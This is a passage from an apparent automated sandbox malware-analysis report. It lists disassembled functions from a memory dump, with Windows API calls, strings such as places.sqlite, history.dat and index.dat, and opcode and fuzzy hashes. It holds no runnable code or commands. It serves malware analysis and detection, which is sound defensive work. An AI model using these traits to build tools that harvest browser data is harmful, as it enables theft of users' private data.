                  • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                  Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@DeleteObject
                  • String ID: r!A
                  • API String ID: 1103273653-628097481
                  • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                  • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                  • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                  • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                  Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??2@
                  • String ID:
                  • API String ID: 1033339047-0
                  • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                  • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                  • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                  • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                  Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                  • memcmp.MSVCRT ref: 00444BA5
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: AddressProc$memcmp
                  • String ID: $$8
                  • API String ID: 2808797137-435121686
                  • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                  • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                  • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                  • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                  Function 00430737 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 94COMMON
                  Download Yara Rule
                  Strings
                  • duplicate column name: %s, xrefs: 004307FE
                  • too many columns on %s, xrefs: 00430763
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: duplicate column name: %s$too many columns on %s
                  • API String ID: 0-1445880494
                  • Opcode ID: d71f1f637ec18e5f8a62c501b2db333135d8de05f3daff8c641ff98159ef3fea
                  • Instruction ID: 332525b9e829d337f3b342900587a6bcab00951879d739311f42b30c77ca79e1
                  • Opcode Fuzzy Hash: d71f1f637ec18e5f8a62c501b2db333135d8de05f3daff8c641ff98159ef3fea
                  • Instruction Fuzzy Hash: 5E314735500705AFCB109F55C891ABEB7B5EF88318F24815BE8969B342C738F841CB99
                  Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                    • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                    • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                    • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                    • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                    • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                    • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                    • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                    • Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                  • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                    • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                    • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                    • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                  • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                  • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                    • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                    • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                    • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                  • String ID:
                  • API String ID: 1042154641-0
                  • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                  • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                  • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                  • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                  Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                    • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                    • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                    • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                  • memset.MSVCRT ref: 00403A55
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                    • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                  • String ID: history.dat$places.sqlite
                  • API String ID: 3093078384-467022611
                  • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                  • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                  • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                  • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                  Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                    • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                    • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                  • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                  • GetLastError.KERNEL32 ref: 00417627
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ErrorLast$File$PointerRead
                  • String ID:
                  • API String ID: 839530781-0
                  • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                  • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                  • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                  • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                  Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: FileFindFirst
                  • String ID: *.*$index.dat
                  • API String ID: 1974802433-2863569691
                  • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                  • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                  • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                  • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                  Function 004099F4 Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@mallocmemcpy
                  • String ID:
                  • API String ID: 3831604043-0
                  • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                  • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                  • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                  • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                  Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                  Download Yara Rule
                  APIs
                  • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                  • GetLastError.KERNEL32 ref: 004175A2
                  • GetLastError.KERNEL32 ref: 004175A8
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ErrorLast$FilePointer
                  • String ID:
                  • API String ID: 1156039329-0
                  • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                  • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                  • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                  • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                  Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                  Download Yara Rule
                  APIs
                  • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                  • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                  • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: File$ChangeCloseCreateFindNotificationTime
                  • String ID:
                  • API String ID: 1631957507-0
                  • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                  • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                  • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                  • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                  Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                  Download Yara Rule
                  APIs
                  • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                  • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Temp$DirectoryFileNamePathWindows
                  • String ID:
                  • API String ID: 1125800050-0
                  • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                  • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                  • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                  • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                  Function 00415320 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  • failed memory resize %u to %u bytes, xrefs: 00415358
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: realloc
                  • String ID: failed memory resize %u to %u bytes
                  • API String ID: 471065373-2134078882
                  • Opcode ID: e5ae129d454b891eada76ccbfa458d0a6592737a0e8831e28bd7d44ced5f0510
                  • Instruction ID: af22f86c8d97814ed0bf188a45fefa7fc909daabc8cee38fca791e75313f3e85
                  • Opcode Fuzzy Hash: e5ae129d454b891eada76ccbfa458d0a6592737a0e8831e28bd7d44ced5f0510
                  • Instruction Fuzzy Hash: 49F027B3A01605A7D2109A55DC418CBF3DCDFC4655B06082FF998D3201E168E88083B6
                  Function 00437371 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 243COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: d
                  • API String ID: 0-2564639436
                  • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                  • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                  • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                  • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                  Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset
                  • String ID: BINARY
                  • API String ID: 2221118986-907554435
                  • Opcode ID: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
                  • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                  • Opcode Fuzzy Hash: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
                  • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                  Function 004104FB Relevance: 3.1, APIs: 2, Instructions: 140COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                    • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                  • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                  • FindCloseChangeNotification.KERNELBASE(?), ref: 00410654
                    • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                    • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                    • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                    • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                  • String ID:
                  • API String ID: 1161345128-0
                  • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                  • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                  • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                  • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                  Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: _wcsicmp
                  • String ID: /stext
                  • API String ID: 2081463915-3817206916
                  • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                  • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                  • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                  • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                  Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                  • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                    • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                    • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                  • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                    • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                  • String ID:
                  • API String ID: 159017214-0
                  • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                  • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                  • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                  • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                  Function 00404423 Relevance: 3.1, APIs: 2, Instructions: 51libraryloaderCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                  • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                  • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                  • String ID:
                  • API String ID: 3150196962-0
                  • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                  • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                  • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                  • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                  Function 004152C6 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 27COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  • failed to allocate %u bytes of memory, xrefs: 004152F0
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: malloc
                  • String ID: failed to allocate %u bytes of memory
                  • API String ID: 2803490479-1168259600
                  • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                  • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                  • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                  • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                  Function 0040B1AB Relevance: 3.0, APIs: 2, Instructions: 14COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@
                  • String ID:
                  • API String ID: 613200358-0
                  • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                  • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                  • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                  • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                  Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcmpmemset
                  • String ID:
                  • API String ID: 1065087418-0
                  • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                  • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                  • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                  • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                  Function 00418C63 Relevance: 2.6, APIs: 2, Instructions: 132COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset
                  • String ID:
                  • API String ID: 2221118986-0
                  • Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                  • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                  • Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                  • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                  Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
